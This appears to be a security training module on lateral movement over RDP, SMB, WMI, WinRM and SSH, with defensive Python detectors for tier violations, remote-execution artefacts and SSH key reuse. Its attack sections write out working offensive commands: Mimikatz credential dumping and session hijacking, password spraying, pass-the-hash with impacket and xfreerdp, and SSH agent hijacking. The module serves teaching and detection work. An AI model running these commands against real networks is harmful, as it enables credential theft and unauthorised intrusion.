SSH, SMB, RDP, WinRM, WMI, and iLO/iDRAC are management protocols, designed for administrators to do their jobs. Attackers love them because they’re everywhere, always allowed between admin endpoints and targets, and every organization has weak or reused credentials that reach through them. This module is about why management protocols are the main rails of lateral movement in 2026.
Why this happens
Management protocols are the backbone of IT operations. An admin needs to log into 500 servers: SSH to 500 Linux boxes, RDP to 200 Windows hosts, PowerShell Remoting (WinRM) to automate, WMI for inventory, SCCM agents calling home, iLO/iDRAC for out-of-band access. Every one of these is an authenticated channel that, once the attacker has the right credentials, gives full control of the target.
Three things make these high-value:
- Credential reuse. The same admin credentials work on many targets, so an attacker who compromises one admin account reaches many targets.
- Credentials cached in memory. When an admin RDPs to a server, their credentials are cached on that server. Compromising the server means extracting the admin’s credentials.
- Legitimate traffic is indistinguishable from attacks. RDP from an admin endpoint to a server is normal. RDP from an attacker’s foothold to a server using stolen creds looks identical. Detection requires context.
The credential-cache problem
When an administrator RDPs from their workstation to a server, Windows caches their credentials on the server in LSASS. If the attacker later compromises the server and has local admin, Mimikatz extracts those cached credentials. Now the attacker has the admin’s credentials without ever compromising the admin’s workstation.
# Attacker compromises a random server via phishing / exploit
# Runs mimikatz or equivalent
sekurlsa::logonpasswords
# Output includes credentials of every user who logged in recently:
# - Domain admin who RDP'd yesterday to troubleshoot
# - Service account whose password is stored
# - Backup admin whose scheduled task runs hourly
# - etc.
# Attacker now has high-privilege credentials from a medium-privilege compromise
This single pattern, Tier 0 admins logging into Tier 1/2 systems, has been responsible for more breach amplification than almost any other technique. It’s why Microsoft’s Tier model exists; it’s why “Privileged Access Workstations” (PAWs) exist.
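The tier model only helps if violations are caught. The script below is an added example, not part of this module: it runs over a constructed list of Windows Security 4624 logon events (already parsed to dicts with the event’s own field names) and flags two things a defender cares about here, a credential-caching logon that puts an account on a host of a lower tier, and a Tier 0 console or RDP session that did not originate from a PAW. The account tiers, host tiers and PAW list are assumptions standing in for an organization’s inventory.

```python
"""Flag privileged logons that land on lower-tier hosts (tiering violations).

Added example, not from the module. Input is a constructed list of Windows
Security 4624 (logon) events already parsed into dicts; field names follow the
event's XML (TargetUserName, LogonType, WorkstationName, Computer). The tier
maps and PAW list are assumptions standing in for an organization's inventory.
"""

# Logon types that generally leave reusable credential material on the target
# (interactive, batch, service, unlock, runas /netonly, RDP, cached interactive).
# Type 3 (network) does not, which is why network logons are the safe default.
CACHING_LOGON_TYPES = {2, 4, 5, 7, 9, 10, 11}
# Console and RDP sessions by Tier 0 accounts must originate from a PAW.
INTERACTIVE_LOGON_TYPES = {2, 10}

# Constructed inventory: lower number = more privileged tier.
ACCOUNT_TIER = {"CORP\\da-jsmith": 0, "CORP\\srv-backup": 1, "CORP\\helpdesk01": 2}
HOST_TIER = {"DC01": 0, "PAW-JSMITH": 0, "APP-SRV-07": 1, "WKS-4432": 2, "WKS-0001": 2}
PAWS = {"PAW-JSMITH"}

# Constructed 4624 events: a domain admin RDPs to an app server from a normal
# workstation, the same admin logs onto a DC from a PAW, a backup account's
# scheduled task runs on a server and later on a workstation, and so on.
SAMPLE_EVENTS = [
    {"TargetUserName": "CORP\\da-jsmith", "LogonType": 10, "WorkstationName": "WKS-4432", "Computer": "APP-SRV-07"},
    {"TargetUserName": "CORP\\da-jsmith", "LogonType": 10, "WorkstationName": "PAW-JSMITH", "Computer": "DC01"},
    {"TargetUserName": "CORP\\srv-backup", "LogonType": 4, "WorkstationName": "-", "Computer": "APP-SRV-07"},
    {"TargetUserName": "CORP\\helpdesk01", "LogonType": 10, "WorkstationName": "WKS-0001", "Computer": "WKS-4432"},
    {"TargetUserName": "CORP\\da-jsmith", "LogonType": 3, "WorkstationName": "PAW-JSMITH", "Computer": "APP-SRV-07"},
    {"TargetUserName": "CORP\\srv-backup", "LogonType": 4, "WorkstationName": "-", "Computer": "WKS-4432"},
]


def find_tier_violations(events, account_tier=ACCOUNT_TIER, host_tier=HOST_TIER, paws=PAWS):
    """Return one finding per event that breaks the tier model.

    A finding is raised when a credential-caching logon puts an account on a host
    of a less privileged tier, or when a Tier 0 account opens a console/RDP
    session from anything other than an approved PAW.
    """
    findings = []
    for ev in events:
        account, host = ev["TargetUserName"], ev["Computer"]
        logon_type = int(ev["LogonType"])
        a_tier, h_tier = account_tier.get(account), host_tier.get(host)
        if a_tier is None or h_tier is None:
            continue  # unknown account or host: an inventory gap, reported elsewhere
        reasons = []
        if logon_type in CACHING_LOGON_TYPES and h_tier > a_tier:
            reasons.append(f"tier {a_tier} account left credentials on tier {h_tier} host")
        source = ev.get("WorkstationName", "-")
        if a_tier == 0 and logon_type in INTERACTIVE_LOGON_TYPES and source not in paws:
            reasons.append(f"Tier 0 session from {source}, which is not an approved PAW")
        if reasons:
            findings.append({"account": account, "host": host, "logon_type": logon_type, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_tier_violations(SAMPLE_EVENTS):
        print(f"{f['account']} -> {f['host']} (type {f['logon_type']}): " + "; ".join(f["reasons"]))
```

On the sample data the admin’s RDP from a plain workstation to the app server is flagged twice (wrong tier, wrong source), the backup account’s task on a workstation is flagged once, and the network logon (type 3) to the app server is not flagged because it leaves nothing in LSASS to harvest.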
RDP attacks
# RDP brute force / password spray against external-exposed
crowbar -b rdp -u admin -C passwords.txt -s 10.0.0.0/24
# Network-level RDP hijacking (if attacker is SYSTEM on target server)
mimikatz # ts::sessions
mimikatz # ts::remote /id:2 # connects to victim's disconnected session
# Pass-the-hash over RDP (Restricted Admin mode): no cleartext credentials needed
xfreerdp /u:admin /pth:NTLMHASH /v:10.0.0.5 /restricted-admin
# RDP MITM via Seth
git clone https://github.com/SySS-Research/Seth
./seth.sh eth0 10.0.0.5 10.0.0.10 10.0.0.100
# Captures credentials when admin RDPs through attacker's position
SMB as lateral movement vector
# PsExec: creates a service, runs command, removes service
impacket-psexec CORP/admin:password@10.0.0.5
# Noisy: service creation, event logs
# WMI execution: quieter, no service
impacket-wmiexec CORP/admin:password@10.0.0.5
# WinRM execution
evil-winrm -u admin -p password -i 10.0.0.5   # Evil-WinRM is a standalone tool, not part of Impacket
# Pass-the-hash across all of the above
impacket-psexec -hashes :NTLMHASH CORP/admin@10.0.0.5
impacket-wmiexec -hashes :NTLMHASH CORP/admin@10.0.0.5
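Each of the three execution paths above leaves a different artefact on the target, which is what makes them detectable even when the credentials are valid. The following is an added example, not code from this module: it classifies constructed Windows events (System 7045 service installs and Security 4688 process creations, parsed into dicts named after the events’ own fields) into PsExec-style service installs, WMI-spawned shells and WinRM-spawned shells. The sample values are invented to resemble what such tools leave behind and are not taken from any real host.

```python
"""Classify host-side artefacts of SMB/WMI/WinRM remote execution.

Added example, not from the module. The input is a constructed list of Windows
events parsed into dicts: System 7045 (a service was installed) and Security
4688 (process creation). Field names follow the events' XML; the sample values
are invented to resemble what the tools in this section leave behind.
"""
import re

# Parent processes that host remote-execution providers on the target.
REMOTE_PARENTS = {
    "wmiprvse.exe": "WMI remote execution",       # WMI provider host spawning a shell
    "wsmprovhost.exe": "WinRM remote execution",  # PowerShell Remoting session host
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Services whose binary is a short random name dropped straight into the
# system root (what the ADMIN$ share maps to) rather than a vendor directory.
RANDOM_SVC_IN_ROOT = re.compile(r"^%systemroot%\\[a-z0-9]{4,8}\.exe$", re.IGNORECASE)

SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "APP-SRV-07", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "APP-SRV-07", "ServiceName": "kXqZ",
     "ImagePath": "%systemroot%\\kXqZ.exe"},
    {"EventID": 7045, "Computer": "APP-SRV-07", "ServiceName": "Sense",
     "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\""},
    {"EventID": 4688, "Computer": "APP-SRV-07",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.1 2>&1"},
    {"EventID": 4688, "Computer": "APP-SRV-07",
     "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig"},
    {"EventID": 4688, "Computer": "APP-SRV-07",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe"},
]


def _basename(path):
    """Last path component, lower-cased, with surrounding quotes removed."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def classify_remote_exec(events):
    """Return (technique, detail) pairs for events matching a remote-exec pattern."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 7045:
            name, image = ev.get("ServiceName", ""), ev.get("ImagePath", "")
            if name.upper() == "PSEXESVC":
                hits.append(("PsExec service install", f"service {name} -> {image}"))
            elif RANDOM_SVC_IN_ROOT.match(image):
                hits.append(("PsExec-style service install", f"random service {name} -> {image}"))
        elif ev.get("EventID") == 4688:
            parent = _basename(ev.get("ParentProcessName", ""))
            child = _basename(ev.get("NewProcessName", ""))
            if parent in REMOTE_PARENTS and child in SHELLS:
                detail = f"{parent} spawned {child}"
                if "admin$" in ev.get("CommandLine", "").lower():
                    detail += " with output redirected to an admin share"
                hits.append((REMOTE_PARENTS[parent], detail))
    return hits


if __name__ == "__main__":
    for technique, detail in classify_remote_exec(SAMPLE_EVENTS):
        print(f"{technique}: {detail}")
```

The legitimate Defender service install and the shell launched from explorer.exe fall through untouched; the two service installs and the two provider-spawned shells are classified. In practice the 7045 rule is the noisy one, as the section says: service creation is logged by default, which is exactly why WMI and WinRM paths need the process-ancestry rule instead.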
SSH attacks beyond brute force
# SSH credential reuse check (worked creds from one target, try others)
hydra -L users.txt -P passwords.txt ssh://10.0.0.0/24 -t 16
# SSH key reuse: extract key from compromised host, try elsewhere
cat ~/.ssh/authorized_keys # on compromised target
# Often: admins have single key authorizing them to 100+ servers
# SSH Agent hijacking (if attacker gains root on a host with live SSH agent)
SSH_AUTH_SOCK=/tmp/ssh-XXX/agent.YYY ssh admin@nextserver
# Uses the admin's forwarded agent: no key extraction needed
# SSH config enumeration (find where admin connects)
cat ~/.ssh/known_hosts # reveals many targets
cat ~/.ssh/config # reveals host aliases, port forwarding
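The defensive counterpart to the key-reuse problem is knowing, before an attacker does, which keys open how many doors. The audit below is an added example, not part of this module: given an inventory of authorized_keys contents collected from each host (constructed here; the key blobs are invented base64 data, not real public keys), it computes OpenSSH-style SHA256 fingerprints, counts the hosts each key is authorized on, and notes whether every copy carries a `from=` source restriction. Host names and comments are assumptions.

```python
"""Audit authorized_keys across hosts for key reuse and missing restrictions.

Added example, not from the module. The inventory below is constructed: each
entry is the authorized_keys content a defender would collect from a host. The
key blobs are invented base64 data, not real public keys; the fingerprint
routine nonetheless matches OpenSSH's SHA256 form (base64 of the SHA-256 of
the decoded blob, padding stripped).
"""
import base64
import hashlib

KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}

# Constructed blobs standing in for real key material.
KEY_A = base64.b64encode(b"constructed key A, authorized nearly everywhere").decode()
KEY_B = base64.b64encode(b"constructed key B, restricted to one source").decode()
KEY_C = base64.b64encode(b"constructed key C, single host").decode()

# Constructed inventory: host -> contents of ~/.ssh/authorized_keys.
INVENTORY = {
    "web01": f"# web tier\nssh-ed25519 {KEY_A} admin@laptop\n",
    "web02": f"ssh-ed25519 {KEY_A} admin@laptop\n",
    "db01": f"ssh-ed25519 {KEY_A} admin@laptop\nssh-rsa {KEY_C} dba@jump\n",
    "bastion": f'from="10.0.0.5",no-port-forwarding ssh-ed25519 {KEY_B} admin@paw\n',
}


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (options, key_type, blob, comment) per key line; skips blanks/comments.

    Options are located by scanning for the key-type token, so quoted option
    values that themselves contain spaces (rare) are not handled.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for i, tok in enumerate(tokens):
            if tok in KEY_TYPES and i + 1 < len(tokens):
                yield (" ".join(tokens[:i]), tok, tokens[i + 1], " ".join(tokens[i + 2:]))
                break


def audit_keys(inventory):
    """Map fingerprint -> {hosts, comment, restricted} across the inventory."""
    keys = {}
    for host, text in inventory.items():
        for options, _ktype, blob, comment in parse_authorized_keys(text):
            entry = keys.setdefault(fingerprint(blob), {"hosts": set(), "comment": comment, "restricted": True})
            entry["hosts"].add(host)
            # A key counts as restricted only if every copy carries a from= source limit.
            if "from=" not in options:
                entry["restricted"] = False
    return keys


def reuse_report(inventory, threshold=2):
    """Keys authorized on at least `threshold` hosts, most widely reused first."""
    report = []
    for fp, info in audit_keys(inventory).items():
        if len(info["hosts"]) >= threshold:
            report.append({"fingerprint": fp, "comment": info["comment"],
                           "hosts": sorted(info["hosts"]), "restricted": info["restricted"]})
    return sorted(report, key=lambda r: -len(r["hosts"]))


if __name__ == "__main__":
    for r in reuse_report(INVENTORY):
        flag = "" if r["restricted"] else " (no from= restriction)"
        print(f"{r['fingerprint']} {r['comment']}: {len(r['hosts'])} hosts{flag}")
```

On the constructed inventory only the admin’s laptop key is reported: it is authorized on three hosts and none of the copies is pinned to a source address, so a single stolen key file or hijacked agent reaches all three. The bastion key is excluded because it appears once and is restricted with `from=`.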
WinRM: a modern PsExec alternative
WinRM (ports 5985/5986) is PowerShell Remoting. Attacker-friendly because it’s commonly allowed in corporate networks and produces fewer logs than PsExec. Evil-WinRM is the standard offensive tool.